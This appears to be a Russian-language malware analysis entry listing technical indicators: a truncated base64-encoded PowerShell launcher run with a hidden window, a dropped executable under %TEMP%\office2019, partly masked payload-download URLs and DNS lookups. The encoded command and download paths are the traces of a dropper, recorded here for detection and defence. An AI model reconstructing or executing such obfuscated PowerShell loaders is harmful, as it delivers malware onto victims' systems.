Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAHgANQB1AGsAdAB3AD0AKAAnAEgAJwArACcAcwBzACcAKwAnADIAXwBzADQAJwApADsAJgAoACcAbgBlAHcAJwArACcALQBpAHQAZQBtACcAKQAgACQARQBOAFYAOgBUAEUAbQBwAFwATwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\uirxlt7t.exe
- %TEMP%\office2019\uirxlt7t.exe
- http://an##oph.com/cgi-bin/u95B/
- http://id###isoft.pt/istore/7U/
- http://www.id###isoft.pt/istore/7U/
- http://b3##op.net/calendar/nnxakTd/
- DNS ASK al####nmission.net
- DNS ASK al####opiedades.cl
- DNS ASK an##oph.com
- DNS ASK id###isoft.pt
- DNS ASK b3##op.net
- DNS ASK no#####mentjuices.com
- DNS ASK en.###echco.com.vn
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAHgANQB1AGsAdAB3AD0AKAAnAEgAJwArACcAcwBzACcAKwAnADIAXwBzADQAJwApADsAJgAoACcAbgBlAHcAJwArACcALQBpAHQAZQBtACcAKQAgACQARQBOAFYAOgBUAEUAbQBwAFwATwBmAEYAaQBjAEUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)